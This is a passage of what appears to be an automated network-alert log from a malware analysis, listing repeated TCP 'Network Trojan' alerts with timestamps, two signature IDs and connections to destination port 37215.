                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.120553
                  SID:2835222
                  Source Port:33478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.880964
                  SID:2829579
                  Source Port:50974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.234468
                  SID:2835222
                  Source Port:54928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.481864
                  SID:2829579
                  Source Port:38822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.872698
                  SID:2835222
                  Source Port:48564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.004457
                  SID:2829579
                  Source Port:42300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.442738
                  SID:2829579
                  Source Port:33196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.324318
                  SID:2829579
                  Source Port:45296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.419943
                  SID:2835222
                  Source Port:44412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.436089
                  SID:2829579
                  Source Port:48754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.695962
                  SID:2835222
                  Source Port:57156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.906290
                  SID:2829579
                  Source Port:41004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.207243
                  SID:2835222
                  Source Port:45688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.605633
                  SID:2835222
                  Source Port:49398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.065687
                  SID:2835222
                  Source Port:55924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.787511
                  SID:2829579
                  Source Port:44874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.490874
                  SID:2829579
                  Source Port:37314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.730689
                  SID:2835222
                  Source Port:34642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.527873
                  SID:2835222
                  Source Port:54514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.782637
                  SID:2835222
                  Source Port:33406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.442446
                  SID:2829579
                  Source Port:51778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.442575
                  SID:2835222
                  Source Port:42192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.127595
                  SID:2835222
                  Source Port:37170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.833874
                  SID:2835222
                  Source Port:45260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.972895
                  SID:2829579
                  Source Port:42686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.044881
                  SID:2829579
                  Source Port:51714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.217232
                  SID:2835222
                  Source Port:40440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.560872
                  SID:2829579
                  Source Port:34478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.861030
                  SID:2829579
                  Source Port:40434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.686618
                  SID:2835222
                  Source Port:48476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.156196
                  SID:2829579
                  Source Port:51598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.088837
                  SID:2829579
                  Source Port:42970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.919298
                  SID:2835222
                  Source Port:56674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.433898
                  SID:2829579
                  Source Port:53182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.890637
                  SID:2835222
                  Source Port:32956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.701278
                  SID:2835222
                  Source Port:38668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.942131
                  SID:2835222
                  Source Port:43472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.121517
                  SID:2835222
                  Source Port:43276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.991583
                  SID:2829579
                  Source Port:37294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.464786
                  SID:2829579
                  Source Port:49974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.083830
                  SID:2835222
                  Source Port:44320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.429155
                  SID:2835222
                  Source Port:37298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.088542
                  SID:2829579
                  Source Port:59854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.371632
                  SID:2835222
                  Source Port:36986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.573908
                  SID:2835222
                  Source Port:38558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.775914
                  SID:2829579
                  Source Port:45742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.616347
                  SID:2835222
                  Source Port:56698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.834879
                  SID:2835222
                  Source Port:53902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.175364
                  SID:2829579
                  Source Port:47292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.516790
                  SID:2835222
                  Source Port:33596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.520024
                  SID:2835222
                  Source Port:35752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.828457
                  SID:2829579
                  Source Port:47330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.732567
                  SID:2835222
                  Source Port:48168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.599679
                  SID:2835222
                  Source Port:55018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.600154
                  SID:2835222
                  Source Port:43938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.034591
                  SID:2835222
                  Source Port:48280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.946656
                  SID:2835222
                  Source Port:49306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.226208
                  SID:2835222
                  Source Port:33520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.849786
                  SID:2835222
                  Source Port:51966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.102138
                  SID:2829579
                  Source Port:60164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.861363
                  SID:2829579
                  Source Port:54242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.666062
                  SID:2829579
                  Source Port:43238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.171053
                  SID:2829579
                  Source Port:48436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.617862
                  SID:2835222
                  Source Port:48940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.575956
                  SID:2829579
                  Source Port:38292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.980953
                  SID:2835222
                  Source Port:38912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.699441
                  SID:2829579
                  Source Port:60460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.661983
                  SID:2835222
                  Source Port:46492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.834165
                  SID:2835222
                  Source Port:60418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:00.596679
                  SID:2835222
                  Source Port:43964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.139662
                  SID:2835222
                  Source Port:48776
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.561309
                  SID:2829579
                  Source Port:58878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.063898
                  SID:2835222
                  Source Port:38950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.562174
                  SID:2835222
                  Source Port:47108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.545025
                  SID:2835222
                  Source Port:44422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.247887
                  SID:2829579
                  Source Port:46544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.016670
                  SID:2829579
                  Source Port:49916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.121816
                  SID:2829579
                  Source Port:60918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.885444
                  SID:2835222
                  Source Port:47724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.894424
                  SID:2829579
                  Source Port:57000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.758809
                  SID:2835222
                  Source Port:46820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.893225
                  SID:2829579
                  Source Port:57598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.621748
                  SID:2829579
                  Source Port:51252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.276422
                  SID:2835222
                  Source Port:49582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.741388
                  SID:2829579
                  Source Port:56636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.017710
                  SID:2829579
                  Source Port:39376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.609281
                  SID:2835222
                  Source Port:46922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.127270
                  SID:2829579
                  Source Port:53456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.016670
                  SID:2835222
                  Source Port:34168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.993743
                  SID:2829579
                  Source Port:48596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.048430
                  SID:2829579
                  Source Port:37634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.368496
                  SID:2829579
                  Source Port:46624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.762632
                  SID:2835222
                  Source Port:51896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.088418
                  SID:2829579
                  Source Port:48086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.938620
                  SID:2835222
                  Source Port:55170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.322018
                  SID:2829579
                  Source Port:46708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.624284
                  SID:2835222
                  Source Port:35232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.623309
                  SID:2829579
                  Source Port:55912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.290741
                  SID:2829579
                  Source Port:44900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.015833
                  SID:2835222
                  Source Port:56070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.111277
                  SID:2829579
                  Source Port:54338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.389175
                  SID:2829579
                  Source Port:43242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.561451
                  SID:2829579
                  Source Port:43006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.064971
                  SID:2829579
                  Source Port:60922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.452507
                  SID:2829579
                  Source Port:58708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.242902
                  SID:2829579
                  Source Port:39658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.005149
                  SID:2829579
                  Source Port:43296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.648060
                  SID:2829579
                  Source Port:47594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.427359
                  SID:2835222
                  Source Port:54998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.844780
                  SID:2835222
                  Source Port:53080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.958835
                  SID:2835222
                  Source Port:55278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.082324
                  SID:2835222
                  Source Port:45308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.145765
                  SID:2835222
                  Source Port:57976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.631591
                  SID:2835222
                  Source Port:36788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.170023
                  SID:2835222
                  Source Port:34782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.602329
                  SID:2829579
                  Source Port:50976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.014654
                  SID:2835222
                  Source Port:46568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.653276
                  SID:2835222
                  Source Port:52758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.136584
                  SID:2835222
                  Source Port:41654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.010263
                  SID:2829579
                  Source Port:53018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778157
                  SID:2829579
                  Source Port:33490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.551823
                  SID:2829579
                  Source Port:57070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.748441
                  SID:2835222
                  Source Port:33626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.428710
                  SID:2835222
                  Source Port:53486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.655390
                  SID:2829579
                  Source Port:59290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.854117
                  SID:2835222
                  Source Port:54918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.799639
                  SID:2835222
                  Source Port:57024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.350538
                  SID:2835222
                  Source Port:51522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.654674
                  SID:2835222
                  Source Port:44898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.636058
                  SID:2835222
                  Source Port:44568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.960962
                  SID:2829579
                  Source Port:36498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.361334
                  SID:2829579
                  Source Port:51898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.513805
                  SID:2835222
                  Source Port:37376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.218292
                  SID:2835222
                  Source Port:59728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.636057
                  SID:2829579
                  Source Port:58160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.505236
                  SID:2835222
                  Source Port:55938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.091838
                  SID:2829579
                  Source Port:34338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.140303
                  SID:2835222
                  Source Port:43382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.925021
                  SID:2829579
                  Source Port:58694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.520024
                  SID:2829579
                  Source Port:46942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:00.477021
                  SID:2835222
                  Source Port:52372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.389316
                  SID:2829579
                  Source Port:59524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.146522
                  SID:2835222
                  Source Port:46860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.107652
                  SID:2829579
                  Source Port:58506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.651958
                  SID:2835222
                  Source Port:38852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.363074
                  SID:2829579
                  Source Port:52046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.172944
                  SID:2835222
                  Source Port:47930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.836589
                  SID:2829579
                  Source Port:56012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.082361
                  SID:2829579
                  Source Port:44724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.607136
                  SID:2829579
                  Source Port:47528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.267264
                  SID:2835222
                  Source Port:47560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.805641
                  SID:2829579
                  Source Port:60274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.401812
                  SID:2835222
                  Source Port:51082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.833957
                  SID:2835222
                  Source Port:39534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.848557
                  SID:2835222
                  Source Port:36454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.512950
                  SID:2829579
                  Source Port:39072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.349931
                  SID:2829579
                  Source Port:54600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.667979
                  SID:2835222
                  Source Port:36728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.742561
                  SID:2829579
                  Source Port:34124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.836090
                  SID:2835222
                  Source Port:46600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.651125
                  SID:2829579
                  Source Port:34940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.847593
                  SID:2835222
                  Source Port:55270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.425890
                  SID:2829579
                  Source Port:45444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.835620
                  SID:2829579
                  Source Port:58800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.516492
                  SID:2835222
                  Source Port:54016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.387027
                  SID:2829579
                  Source Port:36900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.483637
                  SID:2835222
                  Source Port:41060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.545525
                  SID:2835222
                  Source Port:47278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.897844
                  SID:2835222
                  Source Port:60746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.319330
                  SID:2835222
                  Source Port:36804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.596557
                  SID:2829579
                  Source Port:53274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.855166
                  SID:2835222
                  Source Port:40660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.899646
                  SID:2835222
                  Source Port:33292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.783011
                  SID:2835222
                  Source Port:45106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.153609
                  SID:2829579
                  Source Port:36136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.880406
                  SID:2829579
                  Source Port:60832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.658202
                  SID:2835222
                  Source Port:52112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.472271
                  SID:2835222
                  Source Port:56278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.055063
                  SID:2835222
                  Source Port:34982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.185610
                  SID:2829579
                  Source Port:59734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.280858
                  SID:2835222
                  Source Port:34768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.037167
                  SID:2835222
                  Source Port:52016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.870602
                  SID:2835222
                  Source Port:39944
